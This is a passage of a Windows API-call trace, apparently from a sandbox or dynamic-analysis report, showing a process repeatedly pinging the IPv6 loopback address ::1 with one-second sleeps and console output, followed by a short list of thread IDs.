	[0125.410] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xced7c | out: lpMode=0xced7c) returned 1
	[0125.410] _fileno (_File=0x74871228) returned 1
	[0125.410] _setmode (_FileHandle=1, _Mode=131072) returned 16384
	[0125.410] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcecdc, nSize=0x50 | out: lpBuffer="") returned 0x0
	[0125.410] fwprintf (in: _Stream=0x74871228, _Format="%ls" | out: _Stream=0x74871228) returned 24
	[0125.424] fflush (in: _File=0x74871228 | out: _File=0x74871228) returned 0
	[0125.424] _fileno (_File=0x74871228) returned 1
	[0125.424] _setmode (_FileHandle=1, _Mode=16384) returned 65536
	[0125.424] LocalFree (hMem=0xf7c298) returned 0x0
	[0125.424] SetConsoleCtrlHandler (HandlerRoutine=0x1111c70, Add=1) returned 1
	[0125.425] Icmp6SendEcho2 (in: IcmpHandle=0xf70818, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcee30, DestinationAddress=0x1115480, RequestData=0xf6cda8, RequestSize=0x20, RequestOptions=0xcee28, ReplyBuffer=0xf79d90, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xf79d90) returned 0x1
	[0125.444] GetNameInfoW (in: pSockaddr=0x1115480*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xceeb0, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0
	[0125.444] __iob_func () returned 0x74871208
	[0125.444] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcedb0, nSize=0x0, Arguments=0xcedac | out: lpBuffer="\x2fb0\xf7\xf77c\x0c\x2c3c\x111\x1228\x7487\x2723") returned 0x10
	[0125.444] fflush (in: _File=0x74871228 | out: _File=0x74871228) returned 0
	[0125.444] _fileno (_File=0x74871228) returned 1
	[0125.444] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0125.444] GetFileType (hFile=0x3c) returned 0x2
	[0125.444] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xced7c | out: lpMode=0xced7c) returned 1
	[0125.445] _fileno (_File=0x74871228) returned 1
	[0125.445] _setmode (_FileHandle=1, _Mode=131072) returned 16384
	[0125.445] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcecdc, nSize=0x50 | out: lpBuffer="") returned 0x0
	[0125.445] fwprintf (in: _Stream=0x74871228, _Format="%ls" | out: _Stream=0x74871228) returned 16
	[0126.156] fflush (in: _File=0x74871228 | out: _File=0x74871228) returned 0
	[0126.156] _fileno (_File=0x74871228) returned 1
	[0126.156] _setmode (_FileHandle=1, _Mode=16384) returned 65536
	[0126.156] LocalFree (hMem=0xf72fb0) returned 0x0
	[0126.156] __iob_func () returned 0x74871208
	[0126.156] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2726, dwLanguageId=0x0, lpBuffer=0xcedb0, nSize=0x0, Arguments=0xcedac | out: lpBuffer="\xc750\xf7\xf77c\x0c\x2c66\x111\x1228\x7487\x2726") returned 0x9
	[0126.156] fflush (in: _File=0x74871228 | out: _File=0x74871228) returned 0
	[0126.156] _fileno (_File=0x74871228) returned 1
	[0126.156] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0126.156] GetFileType (hFile=0x3c) returned 0x2
	[0126.156] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xced7c | out: lpMode=0xced7c) returned 1
	[0126.276] _fileno (_File=0x74871228) returned 1
	[0126.276] _setmode (_FileHandle=1, _Mode=131072) returned 16384
	[0126.276] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcecdc, nSize=0x50 | out: lpBuffer="") returned 0x0
	[0126.276] fwprintf (in: _Stream=0x74871228, _Format="%ls" | out: _Stream=0x74871228) returned 9
	[0128.225] fflush (in: _File=0x74871228 | out: _File=0x74871228) returned 0
	[0128.225] _fileno (_File=0x74871228) returned 1
	[0128.225] _setmode (_FileHandle=1, _Mode=16384) returned 65536
	[0128.225] LocalFree (hMem=0xf7c750) returned 0x0
	[0128.225] __iob_func () returned 0x74871208
	[0128.225] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcedb4, nSize=0x0, Arguments=0xcedb0 | out: lpBuffer="\x3170\xf7\xf77c\x0c\x2ce5\x111\x1228\x7487\x273f") returned 0x2
	[0128.226] fflush (in: _File=0x74871228 | out: _File=0x74871228) returned 0
	[0128.226] _fileno (_File=0x74871228) returned 1
	[0128.226] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0128.226] GetFileType (hFile=0x3c) returned 0x2
	[0128.226] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xced80 | out: lpMode=0xced80) returned 1
	[0128.391] _fileno (_File=0x74871228) returned 1
	[0128.391] _setmode (_FileHandle=1, _Mode=131072) returned 16384
	[0128.391] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcece0, nSize=0x50 | out: lpBuffer="\xed6c\x0c\x4910\x7757") returned 0x0
	[0128.391] fwprintf (in: _Stream=0x74871228, _Format="%ls" | out: _Stream=0x74871228) returned 2
	[0129.164] fflush (in: _File=0x74871228 | out: _File=0x74871228) returned 0
	[0129.164] _fileno (_File=0x74871228) returned 1
	[0129.164] _setmode (_FileHandle=1, _Mode=16384) returned 65536
	[0129.164] LocalFree (hMem=0xf73170) returned 0x0
	[0129.164] Sleep (dwMilliseconds=0x3e7) 
	[0130.209] Icmp6SendEcho2 (in: IcmpHandle=0xf70818, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcee30, DestinationAddress=0x1115480, RequestData=0xf6cda8, RequestSize=0x20, RequestOptions=0xcee28, ReplyBuffer=0xf79d90, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xf79d90) returned 0x1
	[0130.280] GetNameInfoW (in: pSockaddr=0x1115480*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xceeb0, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0
	[0130.280] __iob_func () returned 0x74871208
	[0130.280] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcedb0, nSize=0x0, Arguments=0xcedac | out: lpBuffer="\x2fb0\xf7\xf77c\x0c\x2c3c\x111\x1228\x7487\x2723") returned 0x10
	[0130.280] fflush (in: _File=0x74871228 | out: _File=0x74871228) returned 0
	[0130.280] _fileno (_File=0x74871228) returned 1
	[0130.280] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0130.280] GetFileType (hFile=0x3c) returned 0x2
	[0130.280] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xced7c | out: lpMode=0xced7c) returned 1
	[0130.377] _fileno (_File=0x74871228) returned 1
	[0130.377] _setmode (_FileHandle=1, _Mode=131072) returned 16384
	[0130.377] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcecdc, nSize=0x50 | out: lpBuffer="") returned 0x0
	[0130.377] fwprintf (in: _Stream=0x74871228, _Format="%ls" | out: _Stream=0x74871228) returned 16
	[0132.659] fflush (in: _File=0x74871228 | out: _File=0x74871228) returned 0
	[0132.659] _fileno (_File=0x74871228) returned 1
	[0132.659] _setmode (_FileHandle=1, _Mode=16384) returned 65536
	[0132.659] LocalFree (hMem=0xf72fb0) returned 0x0
	[0132.659] __iob_func () returned 0x74871208
	[0132.659] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2726, dwLanguageId=0x0, lpBuffer=0xcedb0, nSize=0x0, Arguments=0xcedac | out: lpBuffer="\xc7b8\xf7\xf77c\x0c\x2c66\x111\x1228\x7487\x2726") returned 0x9
	[0132.659] fflush (in: _File=0x74871228 | out: _File=0x74871228) returned 0
	[0132.659] _fileno (_File=0x74871228) returned 1
	[0132.659] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0132.659] GetFileType (hFile=0x3c) returned 0x2
	[0132.659] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xced7c | out: lpMode=0xced7c) returned 1
	[0132.762] _fileno (_File=0x74871228) returned 1
	[0132.762] _setmode (_FileHandle=1, _Mode=131072) returned 16384
	[0132.762] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcecdc, nSize=0x50 | out: lpBuffer="") returned 0x0
	[0132.763] fwprintf (in: _Stream=0x74871228, _Format="%ls" | out: _Stream=0x74871228) returned 9
	[0136.503] fflush (in: _File=0x74871228 | out: _File=0x74871228) returned 0
	[0136.503] _fileno (_File=0x74871228) returned 1
	[0136.503] _setmode (_FileHandle=1, _Mode=16384) returned 65536
	[0136.503] LocalFree (hMem=0xf7c7b8) returned 0x0
	[0136.503] __iob_func () returned 0x74871208
	[0136.503] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcedb4, nSize=0x0, Arguments=0xcedb0 | out: lpBuffer="\x3170\xf7\xf77c\x0c\x2ce5\x111\x1228\x7487\x273f") returned 0x2
	[0136.503] fflush (in: _File=0x74871228 | out: _File=0x74871228) returned 0
	[0136.503] _fileno (_File=0x74871228) returned 1
	[0136.503] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0136.503] GetFileType (hFile=0x3c) returned 0x2
	[0136.503] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xced80 | out: lpMode=0xced80) returned 1
	[0136.604] _fileno (_File=0x74871228) returned 1
	[0136.604] _setmode (_FileHandle=1, _Mode=131072) returned 16384
	[0136.604] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcece0, nSize=0x50 | out: lpBuffer="\xed6c\x0c\x4910\x7757") returned 0x0
	[0136.604] fwprintf (in: _Stream=0x74871228, _Format="%ls" | out: _Stream=0x74871228) returned 2
	[0137.171] fflush (in: _File=0x74871228 | out: _File=0x74871228) returned 0
	[0137.171] _fileno (_File=0x74871228) returned 1
	[0137.171] _setmode (_FileHandle=1, _Mode=16384) returned 65536
	[0137.171] LocalFree (hMem=0xf73170) returned 0x0
	[0137.171] Sleep (dwMilliseconds=0x3e7) 
	[0140.206] Icmp6SendEcho2 (in: IcmpHandle=0xf70818, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcee30, DestinationAddress=0x1115480, RequestData=0xf6cda8, RequestSize=0x20, RequestOptions=0xcee28, ReplyBuffer=0xf79d90, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xf79d90) returned 0x1
	[0140.272] GetNameInfoW (in: pSockaddr=0x1115480*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xceeb0, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0
	[0140.272] __iob_func () returned 0x74871208
	[0140.272] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcedb0, nSize=0x0, Arguments=0xcedac | out: lpBuffer="\x2fb0\xf7\xf77c\x0c\x2c3c\x111\x1228\x7487\x2723") returned 0x10
	[0140.272] fflush (in: _File=0x74871228 | out: _File=0x74871228) returned 0
	[0140.272] _fileno (_File=0x74871228) returned 1
	[0140.272] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0140.272] GetFileType (hFile=0x3c) returned 0x2
	[0140.272] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xced7c | out: lpMode=0xced7c) returned 1
	[0140.368] _fileno (_File=0x74871228) returned 1
	[0140.368] _setmode (_FileHandle=1, _Mode=131072) returned 16384
	[0140.369] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcecdc, nSize=0x50 | out: lpBuffer="") returned 0x0
	[0140.369] fwprintf (_Stream=0x74871228, _Format="%ls") 

Thread:
	id = 142
	os_tid = 0xc48


Thread:
	id = 143
	os_tid = 0xd60


Thread:
	id = 144
	os_tid = 0xe5c